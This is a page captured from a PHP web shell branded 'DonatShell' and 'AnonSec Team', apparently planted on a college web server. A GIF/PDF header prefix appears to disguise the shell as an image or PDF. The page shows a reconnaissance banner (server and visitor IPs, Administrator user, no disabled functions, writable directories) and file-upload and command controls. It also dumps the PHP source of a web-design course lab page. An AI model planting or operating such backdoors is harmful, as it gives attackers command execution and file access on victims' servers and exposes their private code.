GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/_Archive/MMDT1144/Labs/Lab08/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/_Archive/MMDT1144/Labs/Lab08//Lab08.phpinc
<?
// JimMartinson/MMDT1144/Labs/Lab08/index.phpinc

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
include('application.phpinc');
include('Course/courseInfo.phpinc');
include('../../classInfo.phpinc');

$evaluationNumber = 8;
$evaluationType = "Lab";
$evaluationTitle = "";
if ( !isset($assignmentSuffix) ) $assignmentSuffix = '';
$evaluationName = $evaluationType.twoDigit($evaluationNumber).$assignmentSuffix;
#$f_uId = formValue('uId'); if ( $f_uId ) $userId = $f_uId;
#if ( !isset($userId) ) $userId = $_SESSION['userId'];
#$userFileName = str_replace(array("-"," "),"",username($userId));
$title = $evaluationName.": ".$evaluationTitle;
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
$smallTitle = true;
$css .= ',colorCode.css';
include('common/pageHeader.phpinc');
$sectionTitle = $title;
include('common/sectionHeader.phpinc');
include('Gradebook/EvaluationSubmission_BEGIN.phpinc');
$uploadFilename = $evaluationName.'.zip';
?>
<?=$f_message?>
<a name="Lab"></a>
<fieldset><legend>Description</legend>
Demonstrate the ability to manage files on a remote server.<br>
<?=$gradeNote?>
</fieldset>
<?
$ShowSpanCountBefore = false;
#$ShowSpanCountBefore = true;
?>
<fieldset><legend><?=$evaluationType?> Instruction</legend>
<span class="bold attention">Do not perform this lab until Lab 2 has been graded.</span>
<ol id="main" class="count">
	<li>Create a directory called <b><?=$evaluationName?></b> in your site root. All work for this lab will be placed there.</li>
	<li>Create an index page that demonstrates the use of a Dreamweaver behavior.</li>
	<li>Update your site with a link to this assignment.</li>
  <li>Turn in your assignment:
		<ol type="a">
			<li>Ensure you have uploaded all work to your site (<a href="http://cst.ridgewater.edu<?=$courseDirectory?>FTP/<?=$userFileName?>/">http://cst.ridgewater.edu<?=$courseDirectory?>FTP/<?=$userFileName?>/</a>).</li>
			<li>Then <input type="submit" name="f_subtask" value="Submit"> for grading.</li>
		</ol>
  </li>
</ol>
<?=$gradeNote?>
</fieldset>
<?
include('Gradebook/EvaluationSubmission_END.phpinc');
$deductionPoints = $evaluationInfo['evaluationPoints'] / 10; if ( $deductionPoints == 1 ) { $deductionPoints = '1 point'; } else { $deductionPoints = $deductionPoints.' points'; }
?>
<fieldset><legend>Grading Criteria</legend>
Demonstrated assignment effectively: <b><?=$evaluationInfo['evaluationPoints']?></b> points.
<br>
There are some things I expect. If they are incorrect you will lose the following:
<br>
Work submitted incorrectly: -<?=$deductionPoints?>.
<br>
Work submitted late: -<?=$deductionPoints?> per week.
<br>
Re-submission of work for grading: -<?=$deductionPoints?> per submission.
<br>
I reserve the right <b>not</b> to apply the deduction points at my absolute discretion.
</fieldset>
<?
include('../../ReferencesResources.phpinc');
include('common/sectionFooter.phpinc');
?>
<script src="/js/colorCode.js"></script>
<?
#setDebugOn();
include('common/pageFooter.phpinc');

?>

Anon7 - 2022
AnonSec Team